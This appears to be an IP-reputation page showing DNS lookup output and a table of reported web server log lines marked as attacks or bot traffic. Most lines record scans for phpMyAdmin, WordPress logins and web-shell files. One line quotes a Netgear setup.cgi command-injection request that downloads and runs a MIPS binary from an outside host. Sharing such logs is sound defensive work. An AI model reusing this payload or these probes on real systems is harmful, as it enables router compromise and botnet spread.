城市(city): unknown
省份(region): unknown
国家(country): New Zealand
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 3.102.147.242
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7711
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;3.102.147.242. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025020301 1800 900 604800 86400
;; Query time: 14 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Feb 04 02:08:41 CST 2025
;; MSG SIZE rcvd: 106
Host 242.147.102.3.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 242.147.102.3.in-addr.arpa: NXDOMAIN
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 1.20.100.97 | attack | 1.20.100.97 - - [08/Apr/2019:08:27:17 +0800] "POST https://www.eznewstoday.com/wp-login.php HTTP/1.1" 200 5534 "https://www.eznewstoday.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.54.17) Gecko/20166441 Firefox/52.54.17" |
2019-04-08 08:28:11 |
| 14.17.21.58 | attack | 14.17.21.58 - - [06/Apr/2019:14:35:29 +0800] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.64 - - [06/Apr/2019:14:35:29 +0800] "GET /wpo.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-06 14:38:25 |
| 101.227.151.57 | attack | 101.227.151.57 - - [06/Apr/2019:18:57:27 +0800] "GET /pk1914.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.227.151.57 - - [06/Apr/2019:18:57:27 +0800] "GET /pk1914.php HTTP/1.1" 404 209 "http://118.25.52.138/pk1914.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-06 19:00:44 |
| 115.87.27.91 | attack | 115.87.27.91 - - [04/Apr/2019:18:44:53 +0800] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" |
2019-04-04 18:46:39 |
| 45.40.194.24 | attack | 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMyAdmin1/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMyAdmin123/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /pwd/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMyAdmina/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMydmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" 45.40.194.24 - - [03/Apr/2019:02:11:15 +0800] "GET /phpMyAdmins/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" |
2019-04-03 06:19:58 |
| 101.226.79.190 | attack | 101.226.79.190 - - [10/Apr/2019:21:12:51 +0800] "GET /s.php HTTP/1.1" 404 209 "http://118.25.52.138/s.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.185 - - [10/Apr/2019:21:12:51 +0800] "GET /1111.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.185 - - [10/Apr/2019:21:12:51 +0800] "GET /s/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.185 - - [10/Apr/2019:21:12:52 +0800] "GET /1111.php HTTP/1.1" 404 209 "http://118.25.52.138/1111.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-11 06:00:31 |
| 59.36.119.227 | attack | 59.36.119.227 - - [10/Apr/2019:20:12:52 +0800] "GET /hm.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.186 - - [10/Apr/2019:20:12:52 +0800] "GET /lala.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 59.36.119.227 - - [10/Apr/2019:20:12:53 +0800] "GET /hm.php HTTP/1.1" 404 209 "http://118.25.52.138/hm.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.186 - - [10/Apr/2019:20:12:53 +0800] "GET /lala.php HTTP/1.1" 404 209 "http://118.25.52.138/lala.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-11 06:01:37 |
| 194.183.5.226 | botsattack | 194.183.5.226 - - [08/Apr/2019:10:43:42 +0800] "GET //ldskflks HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 194.183.5.226 - - [08/Apr/2019:10:43:43 +0800] "GET //ldskflks HTTP/1.1" 308 249 "http://118.25.52.138:80//ldskflks" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 194.183.5.226 - - [08/Apr/2019:10:43:44 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 194.183.5.226 - - [08/Apr/2019:10:43:44 +0800] "GET / HTTP/1.1" 200 3261 "http://118.25.52.138/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" |
2019-04-08 10:45:12 |
| 122.114.158.230 | attack | 122.114.158.230 - - [04/Apr/2019:09:15:21 +0800] "GET /?m=member&c=index&a=register&siteid=1 HTTP/1.1" 200 101457 "http://eznewstoday.com//index.php?m=member&c=index&a=register&siteid=1" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" |
2019-04-04 09:16:20 |
| 116.255.152.176 | attack | 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //ysy.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//ysy.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "GET //ysy.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//ysy.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //lequ.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "GET //lequ.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //plus/laobiao.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//plus/laobiao.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "GET //plus/laobiao.php HTTP/1.1" 404 232 "http://ipinfo.asytech.cn//plus/laobiao.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "POST //3G.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//3G.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "GET //3G.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//3G.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "POST //data/cache/asd.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-10 10:27:18 |
| 46.29.165.129 | attack | 46.29.165.129 - - [09/Apr/2019:11:12:30 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://185.22.154.89/bins/September.mips%20-O%20/var/tmp/September.mips;%20chmod%20777%20/var/tmp/September.mips;%20/var/tmp/September.mips;%20rm%20-rf%20/var/tmp/September.mips&curpath=/¤tsetting.htm=1" 400 0 "-" "-" |
2019-04-09 11:13:17 |
| 173.48.102.40 | attack | 173.48.102.40 - - [07/Apr/2019:06:51:11 +0800] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C hrome/72.0.3626.119 Safari/537.36" 173.48.102.40 - - [07/Apr/2019:06:51:12 +0800] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C hrome/72.0.3626.119 Safari/537.36" 173.48.102.40 - - [07/Apr/2019:06:51:13 +0800] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C hrome/72.0.3626.119 Safari/537.36" |
2019-04-07 09:18:17 |
| 172.104.108.109 | bots | 172.104.108.109 - - [09/Apr/2019:18:20:18 +0800] "GET / HTTP/1.1" 301 194 "-" "Go-http-client/1.1" 172.104.108.109 - - [09/Apr/2019:18:20:19 +0800] "GET / HTTP/1.1" 200 3280 "http://118.25.52.138:80" "Go-http-client/1.1" |
2019-04-09 18:20:46 |
| 42.156.254.59 | bots | 应该是yisou爬虫,但是不知道为啥400 42.156.254.59 - - [09/Apr/2019:14:25:31 +0800] "GET /wp-content/themes/twentyfifteen/genericons/genericons.css?ver=3.2 HTTP/1.1" 400 3429 "-" "-" 42.156.254.57 - - [09/Apr/2019:14:25:31 +0800] "GET /wp-content/plugins/wp-quicklatex/css/quicklatex-format.css?ver=5.1.1 HTTP/1.1" 400 3429 "-" "-" 42.156.254.59 - - [09/Apr/2019:14:25:31 +0800] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.1.1 HTTP/1.1" 400 3429 "-" "-" 42.156.254.60 - - [09/Apr/2019:14:25:32 +0800] "GET /wp-content/themes/twentyfifteen-child/style.css?ver=5.1.1 HTTP/1.1" 400 3429 "-" "-" |
2019-04-09 14:46:10 |
| 87.106.34.39 | attack | 87.106.34.39 - - [03/Apr/2019:08:15:20 +0800] "POST /xmlrpc.php HTTP/1.0" 404 468 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" |
2019-04-03 08:18:07 |